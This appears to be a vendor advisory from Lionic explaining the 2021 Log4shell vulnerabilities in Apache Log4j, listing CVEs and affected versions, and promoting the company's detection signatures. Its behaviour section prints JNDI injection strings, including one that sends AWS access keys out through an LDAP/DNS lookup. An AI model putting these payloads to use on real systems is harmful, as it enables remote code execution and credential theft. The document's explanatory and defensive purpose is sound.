Hsinchu, Taiwan – Dec 19, 2021 – One of the Apache Log4shell vulnerabilities carries a CVSS score of 10. The maximum CVSS score is 10, so this is the highest critical level. It is CVE-2021-44228: the JNDI lookup feature of Apache Log4j, as used in configuration, log messages, and parameters, does not protect against attacker-controlled LDAP and other JNDI-related endpoints. The Apache organization fixed it and released log4j2 version 2.15.
Soon afterwards, CVE-2021-45046 was found in version 2.15, and version 2.16 was released.
Soon afterwards, CVE-2021-45105 was found in version 2.16, and version 2.17 was released.
Soon afterwards, CVE-2021-44832 was found in version 2.17, and version 2.17.1 was released.
In addition, CVE-2021-4104 is a vulnerability in log4j version 1.2. Although log4j version 1 is already end of life, some people may still use it and not have upgraded to version 2.
CVE-2021-44228, CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 are also referred to by other names such as log4j, log4j2, log4shell and so on. Log4j and log4j2 are very popular logging libraries maintained by the Apache organization for writing text to log files and/or databases. Log4j (version 1) is end of life and log4j2 (version 2) is the current line. Log4shell is the more precise name for these vulnerabilities, because cyber-criminals can use them to execute code remotely with little effort. Whether you are using log4j version 1 or 2, you are strongly recommended to adopt the latest version of log4j2 for security reasons. At the time of writing, version 2.17.1 is the latest.
Update: The CVSS score of CVE-2021-45046 was raised from 3.7 to 9 on Dec 17, 2021. A further vulnerability, CVE-2021-45105, was found that can be used in DoS (Denial of Service) attacks.
Update 2: CVE-2021-44832 was found after log4j 2.17 was released, so log4j 2.17.1 followed soon after.
CVE Id | CVE Description | CVSS v3 Score | Severity Level | Affected log4j Versions |
---|---|---|---|---|
CVE-2021-44228 | JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. | 10.0 | Critical | Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 |
CVE-2021-44832 | This exploit allows a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can execute remote code. | 6.8 | Moderate | Log4j2 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4 |
CVE-2021-45046 | It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. | 9.0 | Critical | Log4j2 2.15 only |
CVE-2021-45105 | Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. | 7.5 | High | Log4j2 versions 2.0-alpha1 through 2.16.0 |
CVE-2021-4104 | JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. | N/A | N/A | Log4j 1.2 only. |
According to a technical report from Rapid7, many cyber-criminals around the world have been exploiting these vulnerabilities since November 2021.
Log4shell Behavior
CVE-2021-44228 allows an attacker to craft an LDAP request that retrieves and runs payloads on a vulnerable host. In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form “${prefix:name}”. For example, “${jndi:ldap://example.com/file}” will load data from “ldap://example.com/file” if the host is connected to the Internet and a cyber-criminal has prepared a malicious LDAP server at “example.com”.
This vulnerability also allows information leakage: an attacker can read and exfiltrate data from files and environment variables on the vulnerable host through an LDAP request. Such LDAP requests can generate a DNS request that leaks sensitive information for applications such as AWS, Hadoop, Postgres, etc.
An example of the format of a JNDI lookup that generates an LDAP request resulting in a DNS request leaking the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY values:
${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.
There are many real examples of log4shell. The first is IKteam's YouTube video of compromising the popular Minecraft game via the Log4shell vulnerability, and the second is a Tesla car compromised via the Log4shell vulnerability, from ExploitWareLabs.
Lionic’s Anti-Intrusion and Anti-Virus rules for Log4shell Vulnerabilities
Again, Lionic studied the log4shell vulnerabilities immediately and released the related signatures. Both the Anti-Intrusion and Anti-Virus signature databases contain rules that defend against the log4shell vulnerabilities. All products based on Lionic security technology can protect against the log4shell vulnerabilities once their signatures are updated to the latest version.
The following two YouTube videos demonstrate that Lionic Pico-UTM can block the log4shell vulnerabilities.
Partial list of Anti-Intrusion rules for Log4shell Vulnerabilities:
Rule ID | Description |
---|---|
8100903 ~ 8100908 | Apache Log4j JNDI Injection Remote Code Execution attempt |
… | … |
Partial list of Anti-Virus rules for Log4shell Vulnerabilities:
Rule ID | Virus Name | Release Date |
---|---|---|
9114807219854095 | Trojan.HTML.Generic.4 | 2021-12-16 |
9093020794585558 | Trojan.Java.Agent.4 | 2021-12-16 |
9189618224015584 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9235690281452323 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9008999622847201 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9191827434065719 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9033340405765520 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9067928544323220 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9146325989646571 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9259682338799974 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9014239844713955 | Trojan.ZIP.Zojfor.4 | 2021-12-16 |
9119691314816421 | Trojan.Java.Agent.3 | 2021-12-16 |
9040875976256033 | Trojan.Java.Agent.4 | 2021-12-15 |
9242430171087494 | Trojan.Script.Generic.4 | 2021-12-15 |
9211518412509961 | Riskware.ZIP.Generic.1 | 2021-12-15 |
9159737756054731 | Trojan.Script.Generic.4 | 2021-12-14 |
9046580433934920 | Trojan.Script.Zojfor.4 | 2021-12-14 |
9151855514369988 | Trojan.Script.Zojfor.4 | 2021-12-14 |
… | … | … |
Conclusion
Plenty of companies have adopted Apache Web Server and Tomcat and run many Java programs, and they are undoubtedly also using log4j2 as their logging tool. Therefore, many big companies such as Amazon AWS, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, Cisco, NetApp and others issued log4shell warnings to their customers. Companies that have adopted log4j2 are strongly recommended to upgrade to the latest version to defend against CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105 and CVE-2021-4104. This is the best way to pull the plug on these vulnerabilities.
However, if network administrators are tired of fixing the endless stream of cybersecurity vulnerabilities, they can use the Lionic Pico-UTM as a “Virtual Bug Fix”. Administrators can then take their time, wait for a stable version and upgrade afterwards. Please also note that some network security appliances have only an Anti-Intrusion feature and no Anti-Virus feature. The Anti-Intrusion and Anti-Virus rules released by Lionic prove once again that an Anti-Intrusion feature alone is not enough for protection.
References:
- Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
- CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
- CVE-2021-44832, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832
- CVE-2021-45046, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
- CVE-2021-45105, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
- CVE-2021-4104, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104
- Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns, https://blogs.juniper.net/en-us/security/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
- Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations, https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/
- The Everyperson's Guide to Log4Shell (CVE-2021-44228), https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/
- ExploitWareLabs, https://www.facebook.com/ExWareLabs
- Log4Shell, https://en.wikipedia.org/wiki/Log4Shell
- Apache Log4j Security Vulnerabilities, https://logging.apache.org/log4j/2.x/security.html
About Lionic Corporation
Lionic Corporation is a worldwide provider of innovative Deep Packet Inspection solutions. Lionic's technologies include a complete DPI-based software engine and related management software, which offer Security Solutions that address anti-virus, anti-intrusion and anti-webthreat, and Content Management Solutions that address application identification, device identification, application-based QoS, web content filtering and parental control.
Lionic's security and content management solutions, cloud-based scan services and signature subscription service are already widely deployed around the world. They help service providers, network appliance manufacturers, semiconductor companies, etc. to enable the next generation of business routers, residential gateways, SD-WAN edges and cloud gateways, advanced firewalls, UTMs, Smart NICs and mobile devices. Products powered by Lionic provide better network management and protect the world's networks from an ever-increasing level of security threats.